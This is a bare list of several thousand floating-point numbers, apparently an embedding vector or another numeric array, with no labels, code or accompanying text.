-0.006672701798379421, -0.019236616790294647, 0.01810947246849537, -0.01132405549287796, 0.015945352613925934, 0.00909982156008482, -0.014682949520647526, 0.004700196906924248, 0.018996158614754677, 0.007285117171704769, -0.02449662983417511, 0.04018649458885193, 0.014675434678792953, -0.016366153955459595, 0.01980770379304886, 0.010767997242510319, 0.0035129368770867586, 0.0027370851021260023, -0.002220476744696498, 0.02470703050494194, 0.031259503215551376, -0.01393151842057705, -0.011744856834411621, -0.020423877984285355, 0.012052942998707294, -0.01229340024292469, 0.0002283643843838945, -0.021776452660560608, 0.010317138396203518, 0.0014972250210121274, -0.012413629330694675, 0.015434379689395428, 0.01191768515855074, -0.011541970074176788, -0.010647768154740334, -0.0035073012113571167, -0.008513705804944038, -0.02055913396179676, -0.023459656164050102, 0.00793510489165783, -0.018154557794332504, 0.005083426367491484, 0.007506789173930883, -0.0017583470325917006, 0.02246776781976223, 0.03369413688778877, -0.008378448896110058, 0.014713006094098091, -0.01668175309896469, -0.01194774266332388, -0.0010773632675409317, 0.02043890580534935, 0.0007077534683048725, -0.03757151961326599, -0.010775511153042316, 0.024902401491999626, 0.0024966273922473192, -0.022152166813611984, 0.01351823192089796, 0.0036275300662964582, 0.02183656580746174, 0.026811035349965096, -0.002075826283544302, -0.01850021630525589, -0.011654685251414776, 0.0004306635237298906, -0.016967296600341797, -0.028178637847304344, -0.002534198807552457, 0.006462301127612591, -0.007559389341622591, 0.0014991036150604486, -0.0020739478059113026, -0.014209548011422157, -0.02667577750980854, -0.0016240288969129324, -0.008814278058707714, -0.010287081822752953, -0.00030033732764422894, -0.0019029973773285747, -0.00953565165400505, 0.00415540998801589, -0.017102554440498352, 0.0039863381534814835, -0.001208863570354879, 0.02712663635611534, 0.013405517674982548, 0.031049102544784546, 0.006706515792757273, 0.0058724284172058105, 0.02482725866138935, -0.009054736234247684, -0.014111862517893314, 0.028328925371170044, 0.007972676306962967, -0.008220648393034935, -0.0035955943167209625, 0.01315754558891058, -0.027487322688102722, 0.01300725992769003, -0.0005245922948233783, -0.017718728631734848, -0.01850021630525589, -0.004395867697894573, 0.014983521774411201, 0.021055078133940697, -0.0021133979316800833, 0.02864452451467514, -0.005383998621255159, 0.005331398453563452, 0.010692854411900043, 0.01581009477376938, 0.0007720947032794356, 0.017688671126961708, 0.0044935536570847034, 0.014247119426727295, -0.0017874649493023753, 0.005966356955468655, 0.014840750023722649, 0.002714542206376791, 0.007980190217494965, -0.02004816196858883, 0.02443651482462883, 0.012233286164700985, 0.001319699571467936, 0.014780635014176369, 0.026961321011185646, -0.014637863263487816, 0.0222573671489954, -0.0339045375585556, -0.0029719071462750435, -0.04211015626788139, 0.0023820342030376196, -0.00036397407529875636, 0.0034321581479161978, 0.026780977845191956, -0.016005465760827065, 0.0004818547167815268, -0.004268124233931303, 0.000020180013962090015, -0.003424643771722913, -0.02673589251935482, -0.0003653830208349973, 0.03745128959417343, -0.007551874965429306, 0.018214672803878784, -0.012413629330694675, 0.027998294681310654, -0.009595765732228756, 0.012225772254168987, -0.014570234343409538, 0.015344208106398582, 0.016546497121453285, 0.0049857404083013535, 0.01253385841846466, -0.01299223117530346, -0.014247119426727295, -0.0016879003960639238, 0.00556434178724885, -0.005827342625707388, 0.01692221127450466, -0.0072400313802063465, 0.012015371583402157, 0.0019781403243541718, 0.02034873329102993, 0.009415422566235065, 0.003713944461196661, 0.005504227243363857, 0.007987705059349537, 0.022422682493925095, -0.004440953489392996, -0.008844335563480854, 0.0039713094010949135, -0.00017588166519999504, 0.03231150656938553, -0.006451029796153307, -0.0034227652940899134, -0.0012877638218924403, 0.000476218992844224, 0.004365810193121433, -0.006150457542389631, -0.022993769496679306, 0.002417727140709758, -0.021656222641468048, 0.024331314489245415, -0.010752968490123749, -0.0073715317994356155, 0.0038961663376539946, 0.014630349352955818, 0.014983521774411201, -0.010076681151986122, -0.014915892854332924, -0.003467851085588336, 0.00505712628364563, 0.0034509438555687666, -0.006007685791701078, -0.011301512829959393, -0.008626420982182026, 0.005068397615104914, 0.038683634251356125, 0.017057469114661217, 0.005545556079596281, -0.016456324607133865, -0.005312612745910883, -0.012150628492236137, -0.00023024296388030052, -0.005192383658140898, 0.017327984794974327, 0.0013629067689180374, -0.007465460803359747, -0.002646913519129157, 0.026480406522750854, -0.00757817504927516, 0.013330374844372272, 0.0057484423741698265, 0.021671252325177193, 0.008739135228097439, -0.009685937315225601, 0.0333033949136734, 0.0016183931147679687, 0.00016660620167385787, -0.01635112427175045, 0.02110016532242298, -0.0008087269379757345, 0.013210145756602287, 0.018845872953534126, 0.013277774676680565, 0.013653489761054516, 0.008025276474654675, -0.008896935731172562, -0.020694391801953316, 0.004891811870038509, -0.02828383818268776, 0.01412689033895731, 0.017162669450044632, -0.002218598034232855, 0.007127317134290934, -0.00759320380166173, -0.001933054649271071, 0.02034873329102993, -0.012751772999763489, 0.003233029041439295, -0.0062180859968066216, -0.00952062290161848, 0.014119376428425312, -0.00953565165400505, -0.002410212764516473, 0.011632141657173634, 0.015321665443480015, 0.00793510489165783, 0.011361626908183098, -0.00850619189441204, 0.009392879903316498, -0.004997011739760637, 0.0012642815709114075, -0.025248060002923012, 0.0011675349669530988, -0.0035674155224114656, 0.0041103241965174675, -0.015163864940404892, 0.0021904194727540016, -0.02294868230819702, 0.0019443260971456766, 0.010985911823809147, 0.004692682530730963, -0.008258219808340073, -0.024902401491999626, -0.01396157592535019, -0.013676032423973083, 0.021430794149637222, -0.002708906540647149, 0.0036707373801618814, -0.014983521774411201, -0.0006532747647725046, -0.004621296655386686, 0.006965759210288525, 0.01015933882445097, 0.007544360589236021, -0.007025873754173517, 0.012841944582760334, 0.002254290971904993, 0.018485186621546745, 0.0016606610734015703, -0.012045429088175297, -0.004414653405547142, -0.0005405602278187871, -0.01517137885093689, 0.0028535567689687014, -0.03342362120747566, -0.010437367483973503, 0.01196277141571045, -0.0006279139779508114, 0.002248655306175351, 0.001138417050242424, 0.014885835349559784, 0.015584665350615978, -0.017613528296351433, -0.018996158614754677, -0.002404577098786831, -0.0025398347061127424, -0.0025999490171670914, -0.014863292686641216, 0.006999573670327663, -0.0038285376504063606, 0.011211341246962547, 0.007694646716117859, 0.0084761343896389, -0.004711468238383532, -0.012218257412314415, 0.00443719606846571, -0.022603025659918785, -0.010219452902674675, -0.02888498269021511, 0.01415694784373045, 0.0062819579616189, 0.008040305227041245, -0.014262148179113865, 0.0014915892388671637, -0.013488175347447395, 0.012826915830373764, -0.00034565795795060694, 0.013119974173605442, -0.005538041703402996, -0.0016991718439385295, -0.001609939499758184, -0.034144993871450424, 0.0018663652008399367, 0.01257894467562437, 0.01212808582931757, 0.034144993871450424, 0.008709077723324299, -0.0068793450482189655, -0.0017583470325917006, -0.03369413688778877, 0.013901461847126484, 0.01662163995206356, 0.009836222976446152, 0.0040952954441308975, -0.0027107850182801485, 0.01438237726688385, 0.035106826573610306, 0.010820597410202026, 0.009174964390695095, -0.016877125948667526, -0.0025360775180161, 0.009971480816602707, -0.011083598248660564, -0.0006668944261036813, 0.010121766477823257, 0.03061327338218689, -0.027848009020090103, 0.002885492518544197, 0.018094442784786224, -0.013450603000819683, -0.005357698537409306, -0.03757151961326599, 0.00926513597369194, 0.012270857580006123, -0.008746649138629436, 0.0015798823442310095, 0.011233883909881115, -0.01825975812971592, 0.012984716333448887, -0.008393476717174053, 0.0004764538025483489, 0.010843140073120594, -0.006157971918582916, 0.0036557086277753115, -0.009385365061461926, -0.012180685997009277, -0.0022467768285423517, -0.03249184787273407, 0.0018259757198393345, 0.008663992397487164, -0.00226744101382792, 0.009851251728832722, 0.008739135228097439, 0.010700368322432041, 0.01096336916089058, 0.021881652995944023, 0.011857571080327034, 0.0023538556415587664, 0.02031867764890194, -0.004538639448583126, 0.020964907482266426, 0.035317227244377136, 0.008701563812792301, -0.003310050815343857, 0.00474528269842267, -0.005639484617859125, -0.0036087443586438894, -0.024631887674331665, -0.016756897792220116, -0.00396003806963563, -0.01683204062283039, 0.019552217796444893, -0.013330374844372272, 0.008235677145421505, -0.017688671126961708, -0.0052337124943733215, -0.001524464343674481, -0.006499872542917728, 0.0190713033080101, -0.011617112904787064, 0.020363762974739075, -0.008198104798793793, 0.017493298277258873, 0.0032875079195946455, -0.0002294210862601176, -0.05440355837345123, 0.0030076000839471817, 0.0028141066431999207, -0.002665699226781726, -0.007484246511012316, 0.011617112904787064, -0.0016522074583917856, -0.007074716966599226, 0.0032048504799604416, -0.023204170167446136, 0.004805397242307663, 0.016275981441140175, -0.025638803839683533, 0.017733756452798843, -0.0011966528836637735, 0.02846418134868145, -0.017403127625584602, 0.008220648393034935, -0.0024759629741311073, 0.0046025109477341175, 0.013630947098135948, -0.005789770744740963, -0.020483991131186485, 0.00025971312425099313, -0.0013497567269951105, -0.007709675468504429, 0.024631887674331665, -0.0024214843288064003, -0.000802151917014271, -0.009250108152627945, -0.009107336401939392, -0.009858766570687294, 0.01193271391093731, -0.0026976349763572216, 0.012834430672228336, 0.024902401491999626, -0.007702161092311144, 0.03685014322400093, -0.0057183848693966866, -0.000030614915885962546, 0.004403382074087858, 0.016336096450686455, -0.006285714916884899, 0.0004809154197573662, -0.004891811870038509, 0.018665529787540436, 0.02034873329102993, 0.0014239605516195297, 0.006954487878829241, -0.03267219290137291, -0.005658270791172981, -0.0006866194889880717, 0.011880113743245602, -0.004591239616274834, 0.029380926862359047, -0.0009777987143024802, 0.008942021057009697, 0.006804201751947403, -0.007450432050973177, 0.007093502674251795, 0.015269065275788307, 0.007146102841943502, -0.008153019472956657, 0.009994023479521275, -0.004538639448583126, -0.006909402087330818, 0.022302452474832535, 0.00785996112972498, 0.005955085624009371, 0.009941423311829567, 0.023564856499433517, -0.014314748346805573, -0.024211086332798004, -0.014359834603965282, 0.005831099580973387, -0.0018832723144441843, 0.0008350269636139274, -0.006800444796681404, 0.002740842290222645, 0.018214672803878784, -0.015051149763166904, 0.02204696647822857, 0.009362822398543358, 0.012826915830373764, 0.027667665854096413, 0.015825122594833374, -0.027141664177179337, 0.01593032293021679, -0.0006640765932388604, 0.01828981563448906, 0.014780635014176369, 0.038202717900276184, -0.014510120265185833, 0.005147297866642475, -0.01394654717296362, -0.0006570318946614861, 0.01147434115409851, -0.004324481822550297, 0.001449321280233562, 0.005504227243363857, 0.002671334892511368, -0.010910768993198872, 0.009978994727134705, -0.01011425256729126, -0.002248655306175351, 0.022272394970059395, -0.007375288754701614, -0.015133807435631752, 0.01674186810851097, 0.047009482979774475, 0.012075485661625862, 0.004268124233931303, 0.026660749688744545, 0.017027411609888077, 0.016516439616680145, 0.003249936271458864, 0.001151566975750029, -0.018755702301859856, 0.0029286998324096203, 0.03134967386722565, -0.003330715000629425, -0.010467424988746643, 0.009580736979842186, 0.011579541489481926, -0.0018569722305983305, -0.006203057710081339, -0.0009331826004199684, 0.012706687673926353, -0.015239007771015167, 0.008220648393034935, -0.008303305134177208, 0.02688617818057537, -0.02070942148566246, 0.01250380091369152, -0.01148936990648508, 0.005214926786720753, -0.012007856741547585, 0.011752370744943619, -0.03745128959417343, 0.035317227244377136, 0.021596107631921768, -0.01015933882445097, 0.005331398453563452, -0.02079959213733673, -0.000025933153665391728, -0.026179833337664604, 0.007660832721740007, -0.007014602422714233, 0.0004301938752178103, 0.015404322184622288, -0.01859038695693016, 0.00953565165400505, -0.003139100270345807, -0.009558194316923618, -0.017493298277258873, 0.01874067261815071, -0.0037177016492933035, 0.005184869281947613, 0.03171036019921303, 0.025698918849229813, -0.01611066609621048, 0.006011442746967077, -0.016245923936367035, 0.012263343669474125, 0.0029775428120046854, 0.027051493525505066, 0.010024080984294415, 0.00009199151099892333, 0.005260012578219175, -0.011842542327940464, 0.04502570629119873, -0.021716337651014328, 0.012624030001461506, -0.023549826815724373, 0.0030339001677930355, 0.0057484423741698265, 0.030538130551576614, 0.0302826426923275, 0.0036369229201227427, 0.002755870809778571, -0.019206559285521507, -0.008092905394732952, -0.00353547977283597, -0.010745454579591751, 0.0061016143299639225, 0.01647135429084301, 0.006567501462996006, -0.03363402187824249, -0.01399163343012333, 0.006766630336642265, -0.015344208106398582, 0.0033156864810734987, -0.000714328489266336, -0.004343267530202866, -0.00238015572540462, -0.02810349501669407, 0.0045949965715408325, 0.01533669326454401, 0.025368288159370422, -0.0062331147491931915, 0.005019554868340492, -0.02049902081489563, -0.01602049544453621, -0.010813082568347454, 0.0125639159232378, -0.017974214628338814, -0.01578003726899624, -0.028088467195630074, 0.0032292718533426523, 0.01238357275724411, 0.021400736644864082, 0.004557425156235695, -0.017358040437102318, 0.023790284991264343, 0.011759885586798191, -0.0012943388428539038, 0.0026750920806080103, -0.00523746944963932, -0.01148936990648508, 0.03291264921426773, -0.015855180099606514, -0.004076509736478329, -0.0034847583156079054, -0.021686280146241188, -0.001192895695567131, 0.022092051804065704, 0.0033889508340507746, -0.013924004510045052, 0.030177442356944084, 0.019447017461061478, 0.010452396236360073, 0.002825378207489848, -0.001508496468886733, -0.007829904556274414, -0.00364819448441267, -0.006883102003484964, 0.00010291073704138398, 0.00226744101382792, 0.021355651319026947, -0.02655554935336113, -0.0006565622752532363, -0.006777901668101549, -0.02079959213733673, -0.01859038695693016, -0.017553413286805153, 0.012571429833769798, -0.025999490171670914, -0.008205619640648365, -0.01689215376973152, -0.021310564130544662, 0.0186204444617033, -0.0052261981181800365, 0.009092307649552822, 0.027742808684706688, 0.00463256798684597, -0.02052907831966877, -0.004842968657612801, 0.006890616379678249, -0.00136666395701468, -0.0038961663376539946, -0.02652549184858799, 0.009670908562839031, -0.0009646487305872142, 0.018184615299105644, -0.008881906978785992, -0.009174964390695095, -0.03570796921849251, 0.017207754775881767, 0.014803177677094936, 0.0003390829369891435, -0.012939631007611752, 0.00040037150029093027, 0.010482453741133213, 0.01518640760332346, 0.034655969589948654, 0.010955854319036007, -0.02419605664908886, 0.015569636598229408, -0.017914099618792534, -0.003661344526335597, 0.03070344403386116, -0.008423534221947193, -0.00011981791612925008, 0.01033968199044466, -0.007029631175100803, 0.018034327775239944, 0.006319529376924038, -0.029786698520183563, -0.0032912648748606443, -0.00011817416816484183, 0.00287234247662127, -0.019161473959684372, -0.028389038518071175, -0.008288277313113213, -0.012240801006555557, -0.02491743117570877, -0.014848263934254646, 0.009978994727134705, 0.02303885482251644, 0.0278630368411541, -0.021430794149637222, 0.016756897792220116, 0.009385365061461926, 0.01831987127661705, -0.01432226225733757, -0.015254036523401737, -0.014419948682188988, -0.021671252325177193, 0.0017921613762155175, -0.0076082325540483, -0.01605055294930935, -0.009220050647854805, 0.014863292686641216, 0.006977031007409096, 0.0028685852885246277, 0.010767997242510319, -0.0016738111153244972, 0.004519853740930557, -0.0018128257943317294, 0.016275981441140175, -0.0028667068108916283, -0.00894953589886427, 0.002023226348683238, -0.009287679567933083, 0.015629751607775688, -0.009700966067612171, 0.0038811378180980682, 0.00710101705044508, -0.005797285120934248, -0.0270965788513422, -0.0009759201784618199, -0.005887456703931093, -0.033934593200683594, 0.007450432050973177, 0.002509777434170246, 0.002528563141822815, -0.013856375589966774, -0.009272650815546513, 0.009761080145835876, 0.014825721271336079, -0.005256255157291889, -0.006157971918582916, 0.015103749930858612, 0.004016395192593336, -0.0010613953927531838, 0.006203057710081339, -0.008062847889959812, -0.0021697550546377897, -0.005560584831982851, -0.012315943837165833, 0.00016754548414610326, 0.021460851654410362, -0.023053882643580437, -0.017087526619434357, -0.015261550433933735, 0.008190590888261795, 0.022332509979605675, 0.01777884177863598, -0.0021415764931589365, 0.01117376983165741, 0.007972676306962967, 0.016125695779919624, -0.02697635069489479, -0.0019818975124508142, 0.013082402758300304, -0.010467424988746643, -0.0007138588698580861, -0.007672104053199291, 0.002137819305062294, 0.00667645875364542, 0.007273845840245485, -0.023414570838212967, 0.017613528296351433, -0.010865682736039162, 0.006575015839189291, 0.0025191702879965305, 0.002906156936660409, -0.0028065924998372793, -0.009994023479521275, -0.005038340575993061, -0.005943814292550087, -0.002096490701660514, -0.0006795748486183584, 0.0025943133514374495, 0.021325593814253807, -0.008851849474012852, 0.0024628129322081804, 0.03558774292469025, 0.000015248752788465936, 0.014232090674340725, -0.01396157592535019, 0.004241824150085449, 0.00474528269842267, 0.008205619640648365, 0.01704244129359722, -0.019266674295067787, -0.0023125270381569862, -0.014810692518949509, 0.019176503643393517, 0.009843737818300724, -0.013856375589966774, 0.002406455809250474, 0.0002456237853039056, -0.0028479211032390594, -0.00832584872841835, 0.01248877216130495, 0.0071160453371703625, 0.010880711488425732, 0.022963711991906166, 0.0059851426631212234, 0.021701307967305183, -0.024226114153862, 0.010151823982596397, -0.004350781906396151, 0.01238357275724411, 0.0012999745085835457, 0.0178690142929554, 0.002410212764516473, 0.0040877810679376125, 0.001037913141772151, -0.004035180900245905, 0.007844933308660984, -0.0186204444617033, 0.0029286998324096203, -0.012511315755546093, -0.016065580770373344, 0.021490909159183502, 0.035076770931482315, -0.02073947712779045, 0.003003842895850539, 0.004358296282589436, -0.005526770371943712, -0.0030808644369244576, 0.015148836188018322, -0.026330118998885155, 0.00003170096897520125, -0.011436769738793373, -0.0004233840445522219, 0.01995798945426941, -0.004249338526278734, 0.00003989038668805733, -0.014525149017572403, -0.001480317790992558, 0.0021096407435834408, -0.008979592472314835, -0.02995201386511326, 0.00813047681003809, -0.016486382111907005, -0.022092051804065704, 0.0046100253239274025, -0.0135482894256711, 0.007717189844697714, 0.00047786274808458984, 0.01605055294930935, 0.025082744657993317, -0.029516184702515602, -0.002528563141822815, 0.012714201584458351, -0.013232688419520855, 0.03204099088907242, 0.001001280965283513, 0.010858168825507164, -0.01253385841846466, 0.02419605664908886, 0.006060285959392786, 0.0033532578963786364, -0.0021490908693522215, -0.0008937324746511877, -0.00232379836961627, -0.003351379418745637, -0.04460490494966507, 0.005883699748665094, 0.006349586416035891, -0.013683547265827656, -0.000011168720448040403, 0.0157499797642231, -0.003952523693442345, -0.025668861344456673, 0.025939375162124634, -0.004474767949432135, 0.016396209597587585, 0.015524551272392273, 0.0014145676977932453, -0.0017179576680064201, 0.011789942160248756, -0.0010783026227727532, 0.0005612245295196772, 0.005399026907980442, -0.027457265183329582, 0.012887030839920044, -0.008942021057009697, -0.011038511991500854, -0.0004846725787501782, 0.00011330161214573309, 0.003997609484940767, -0.011481855995953083, 0.024541715160012245, 0.015975410118699074, 0.008926992304623127, 0.0010679704137146473, -0.0019969262648373842, 0.00990385189652443, 0.004914354532957077, 0.0002027687878580764, 0.008355905301868916, -0.013450603000819683, -0.005962600000202656, -0.0059776282869279385, 0.015449408441781998, -0.0157499797642231, -0.001415506936609745, 0.01320263184607029, 0.0018250364810228348, 0.019326789304614067, -0.015051149763166904, 0.00912987906485796, -0.001980019034817815, -0.010858168825507164, 0.006567501462996006, -0.016275981441140175, -0.012255828827619553, 0.009024678729474545, 0.00896456465125084, 0.001322517404332757, -0.003997609484940767, -0.01218820083886385, -0.02189668081700802, -0.006120400503277779, -0.0007270088535733521, -0.00908479280769825, 0.008739135228097439, -0.017598498612642288, 0.004786611534655094, 0.019191531464457512, 0.017162669450044632, -0.002680727746337652, 0.0066088298335671425, 0.010512510314583778, -0.009978994727134705, 0.015178893692791462, -0.027817951515316963, -0.017613528296351433, 0.01193271391093731, 0.011865084990859032, 0.0008063787245191634, 0.004136624280363321, -0.00831081997603178, 0.01571992225944996, 0.010414824821054935, -0.0047264969907701015, 0.013022287748754025, -0.02025856263935566, -0.035437457263469696, 0.012826915830373764, -0.015704894438385963, 0.014735549688339233, 0.0031973361037671566, 0.002911792602390051, -0.012428658083081245, -0.0004243233415763825, 0.026179833337664604, -0.015239007771015167, -0.009122364223003387, -0.002002561930567026, 0.008355905301868916, -0.002288105431944132, -0.004951925948262215, 0.001144052715972066, -0.0016493896255269647, 0.012864488177001476, -0.010752968490123749, 0.011466827243566513, 0.0062256003729999065, 0.005211169365793467, -0.02852429635822773, 0.019942961633205414, 0.016245923936367035, 0.016005465760827065, 0.011038511991500854, 0.008648963645100594, -0.015163864940404892, 0.003603108460083604, -0.0031278289388865232, -0.0044634961523115635, -0.0004694091621786356, -0.005849885288625956, 0.021551022306084633, -0.010219452902674675, 0.0075180609710514545, 0.0032123648561537266, -0.004933140240609646, -0.00006663073872914538, -0.013360431417822838, -0.01320263184607029, -0.004313210491091013, 0.007454189006239176, 0.01496097818017006, -0.0017376827308908105, 0.002459055744111538, 0.009159935638308525, 0.0018926651682704687, -0.027261894196271896, -0.03146990388631821, -0.011579541489481926, -0.000030174625862855464, -0.009362822398543358, 0.017087526619434357, -0.01629100926220417, -0.0025266846641898155, 0.012240801006555557, -0.003728973213583231, -0.019101358950138092, -0.004279396031051874, -0.006135428790003061, 0.0045949965715408325, -0.004677653778344393, 0.006796687375754118, -0.005515499040484428, -0.021566051989793777, 0.009362822398543358, -0.004275638610124588, -0.0032292718533426523, -0.007431646343320608, 0.016576554626226425, -0.013165059499442577, -0.002864828333258629, -0.019326789304614067, 0.001974383369088173, -0.010009052231907845, 0.017884042114019394, -0.02667577750980854, -0.00030808645533397794, 0.004459739197045565, -0.0001902058138512075, 0.0064923581667244434, 0.01439740601927042, -0.004275638610124588, 0.005406541284173727, 0.0017592862714082003, 0.011346598155796528, 0.010572625324130058, -0.014389891177415848, 0.012458715587854385, -0.0007941679796203971, -0.003770301816985011, -0.002316283993422985, 0.015674836933612823, -0.009032192640006542, 0.012924602255225182, -0.006191786378622055, -0.017718728631734848, 0.018154557794332504, 0.030478015542030334, -0.022813426330685616, 0.017643583938479424, 0.007619503885507584, -0.0036294085439294577, -0.012654087506234646, -0.0044710105285048485, -0.001045427517965436, -0.003659465815871954, 0.019206559285521507, 0.0007472035358659923, 0.0033682866487652063, -0.006075314246118069, -0.02398565784096718, 0.03177047520875931, 0.01831987127661705, 0.004256852902472019, -0.01837998628616333, -0.02416600100696087, -0.0029850571881979704, 0.012706687673926353, -0.006992059294134378, 0.03546751290559769, 0.03061327338218689, 0.012428658083081245, 0.008220648393034935, 0.005147297866642475, -0.006950730923563242, 0.008724106475710869, -0.011955256573855877, -0.009978994727134705, 0.016756897792220116, 0.0010050381533801556, 0.006980787962675095, 0.01841004379093647, -0.013691061176359653, 0.010557596571743488, -0.008400991559028625, -0.010317138396203518, -0.0017611648654565215, 0.023459656164050102, -0.0066238585859537125, 0.01351823192089796, 0.002583041787147522, -0.028389038518071175, 0.012120571918785572, -0.010715397074818611, -0.002466570120304823, -0.009377851150929928, -0.02586423233151436, 0.014329777099192142, -0.02488737367093563, -0.005654513370245695, 0.002207326702773571, 0.017673641443252563, -0.008453591726720333, 0.012466229498386383, -0.0043470244854688644, 0.0034903939813375473, 0.002455298788845539, 0.015659809112548828, -0.007033388130366802, -0.0013046709354966879, 0.021596107631921768, -0.0007213731296360493, 0.02273828350007534, -0.007844933308660984, 0.0066238585859537125, 0.02061924897134304, -0.01841004379093647, -0.00808539055287838, 0.0009759201784618199, -0.008303305134177208, -0.005196141079068184, 0.007844933308660984, 0.022242339327931404, -0.038322947919368744, -0.023369483649730682, -0.0030526858754456043, -0.01315754558891058, -0.016576554626226425, 0.009618308395147324, -0.005391512997448444, 0.00912987906485796, -0.007987705059349537, 0.00807036180049181, 0.000052658830099971965, -0.01315754558891058, 0.01789907179772854, -0.009791137650609016, 0.005507984664291143, 0.008032790385186672, 0.004459739197045565, -0.02530817501246929, -0.013074887916445732, -0.009881309233605862, 0.023970628157258034, -0.023805314674973488, -0.009092307649552822, 0.01605055294930935, -0.004200495779514313, -0.0009604219230823219, -0.0022223552223294973, 0.012255828827619553, 0.030808644369244576, -0.002406455809250474, 0.00598890008404851, -0.025774061679840088, -0.008686535060405731, 0.027682693675160408, 0.004388353321701288, 0.003103407332673669, 0.01318760309368372, 0.028088467195630074, -0.001658782479353249, 0.01133908424526453, 0.005891214124858379, 0.0025248059537261724, -0.010813082568347454, -0.02198685146868229, -0.013074887916445732, 0.011166254989802837, -0.0017564684385433793, 0.0002453889755997807, 0.012278372421860695, -0.003926223609596491, -0.023715142160654068, 0.006984545383602381, -0.00832584872841835, 0.003922466654330492, -0.0442141629755497, 0.00414038123562932, 0.014818206429481506, 0.004301938693970442, -0.01312748808413744, 0.0029963285196572542, -0.010745454579591751, 0.0066163442097604275, -0.000952437985688448, 0.010940826497972012, 0.006544958334416151, -0.0018682436784729362, 0.001666296855546534, 0.006015200167894363, -0.011376655660569668, -0.01810947246849537, 0.007837418466806412, -0.01674186810851097, -0.00425309594720602, -0.019341817125678062, 0.001589275198057294, -0.014645378105342388, 0.002453420078381896, -0.006037742830812931, 0.005970114376395941, 0.007604475133121014, 0.022422682493925095, 0.006556229665875435, 0.02022850513458252, -0.01995798945426941, 0.011181283742189407, -0.02043890580534935, -0.005808556452393532, 0.010437367483973503, -0.006210572086274624, -0.008573820814490318, -0.017538385465741158, -0.001570489490404725, 0.00932525098323822, -0.014412433840334415, -0.000947271881159395, -0.004749039653688669, -0.015584665350615978, -0.0079501336440444, 0.0015413715736940503, -0.002015711972489953, -0.0012642815709114075, 0.0016550254076719284, 0.011256426572799683, -0.020754506811499596, 0.0045010680332779884, -0.010843140073120594, 0.018425071612000465, -0.010692854411900043, 0.01357834693044424, -0.015734951943159103, 0.014758092351257801, 0.008025276474654675, -0.015885237604379654, -0.0025924346409738064, 0.01396157592535019, 0.019762618467211723, -0.012887030839920044, 0.013059860095381737, -0.007709675468504429, -0.0035073012113571167, -0.0008458287920802832, 0.004275638610124588, 0.0031278289388865232, -0.0020251048263162374, 0.0024571772664785385, -0.005507984664291143, -0.00598890008404851, 0.009062250144779682, 0.00040225006523542106, -0.005417813081294298, -0.015524551272392273, 0.04015643894672394, 0.0022899839095771313, -0.009317736141383648, 0.0036820087116211653, 0.020784564316272736, 0.0046175397001206875, 0.005511741619557142, 0.004542396403849125, 0.005613184999674559, -0.025233032181859016, -0.005928785540163517, 0.023534798994660378, 0.015111264772713184, 0.0009101700270548463, -0.008438562974333763, 0.007792332675307989, -0.02216719649732113, -0.014442491345107555, 0.01810947246849537, 0.022633083164691925, -0.015051149763166904, -0.0442141629755497, -0.01904124580323696, -0.0011402955278754234, 0.019717533141374588, -0.014938435517251492, 0.005846128333359957, 0.013300317339599133, 0.030417900532484055, 0.0036820087116211653, 0.0007110409787856042, 0.030838701874017715, 0.004305696114897728, 0.003990095108747482, 0.0028460423927754164, -0.017643583938479424, 0.0063721295446157455, -0.0034828796051442623, 0.009731023572385311, -0.0003327427548356354, 0.012736744247376919, 0.002201691037043929, -0.016005465760827065, -0.015223979018628597, 0.0159002672880888, 0.0218065083026886, 0.0249775443226099, 0.0021603622008115053, 0.002057040575891733, -0.0008711895789019763, -0.004801639821380377, 0.0035411156713962555, 0.010174366645514965, 0.006432244088500738, 0.025383317843079567, -0.004395867697894573, 0.023429598659276962, 0.017297927290201187, 0.005643242038786411, -0.00008236381108872592, 0.0006964820204302669, 0.01199282892048359, -0.0030545643530786037, 0.016997354105114937, -0.0036218944005668163, 0.004929383285343647, 0.011752370744943619, 0.014615320600569248, 0.016306038945913315, 0.006011442746967077, 0.014277176931500435, 0.01578003726899624, 0.015178893692791462, 0.01856032945215702, -0.010783025994896889, -0.0010726668406277895, -0.00909982156008482, 0.021325593814253807, -0.0077397325076162815, -0.006188028957694769, -0.011722313240170479, 0.008679020218551159, 0.008791735395789146, 0.05695842206478119, 0.0004402912163641304, -0.020664334297180176, -0.029441041871905327, -0.006274443585425615, 0.01291708741337061, -0.029666470363736153, 0.039675522595644, 0.00228246976621449, 0.015088721178472042, -0.015163864940404892, -0.000877294922247529, 0.005534284748136997, 0.03216122090816498, 0.004099052399396896, 0.01314251683652401, 0.014705492183566093, 0.004933140240609646, -0.00697327358648181, -0.014825721271336079, -0.013014773838222027, -0.010512510314583778, 0.00333822937682271, 0.005222441162914038, 0.008431049063801765, -0.008190590888261795, 0.02992195636034012, -0.002727692248299718, -0.033994708210229874, -0.013871404342353344, 0.019747590646147728, 0.014389891177415848, -0.02076953463256359, -0.006041500251740217, -0.010565110482275486, -0.009528136812150478, -0.011677227914333344, 0.005447870120406151, 0.00026534884818829596, 0.026239948347210884, -0.04346273094415665, -0.007007088046520948, -0.028599439188838005, 0.006229357793927193, -0.02061924897134304, -0.0017912221373990178, 0.00022754250676371157, 0.007533089257776737, 0.004636325407773256, -0.0023707628715783358, 0.00850619189441204, -0.01312748808413744, 0.002994450042024255, 0.005429084412753582, -0.008881906978785992, -0.01538177952170372, -0.008370934054255486, 0.01257894467562437, 0.008709077723324299, 0.00089795928215608, -0.02094987779855728, 0.021130220964550972, 0.005605670623481274, 0.035317227244377136, -0.012458715587854385, -0.01250380091369152, -0.004384596366435289, -0.0028817353304475546, 0.016937240958213806, -0.0051247552037239075, -0.006883102003484964, -0.010527539066970348, -0.017568441107869148, -0.012669116258621216, -0.0005142601439729333, -0.0157499797642231, 0.0009463325841352344, -0.015629751607775688, -0.004365810193121433, -0.011331569403409958, 0.011639656499028206, -0.007965161465108395, 0.008731620386242867, 0.011887628585100174, -0.0014558963011950254, 0.006650158669799566, -0.03306293487548828, 0.015599694103002548, 0.009836222976446152, -0.000149464191053994, -0.010767997242510319, -0.0053727272897958755, -0.023519771173596382, -0.0017592862714082003, 0.01644129678606987, -0.02458680048584938, -0.013630947098135948, 0.016065580770373344, 0.014652892015874386, -0.007867475971579552, 0.005177355371415615, -0.000986252329312265, 0.002658184850588441, 0.01874067261815071, -0.00909982156008482, 0.005496712867170572, -0.012939631007611752, 0.013608403503894806, 0.02067936398088932, -0.004700196906924248, -0.002761506475508213, 0.011121169663965702, -0.002968149958178401, -0.01662163995206356, 0.002913671312853694, -0.017433185130357742, 0.014434977434575558, -0.029110413044691086, -0.027622580528259277, -0.004764068406075239, 0.01995798945426941, 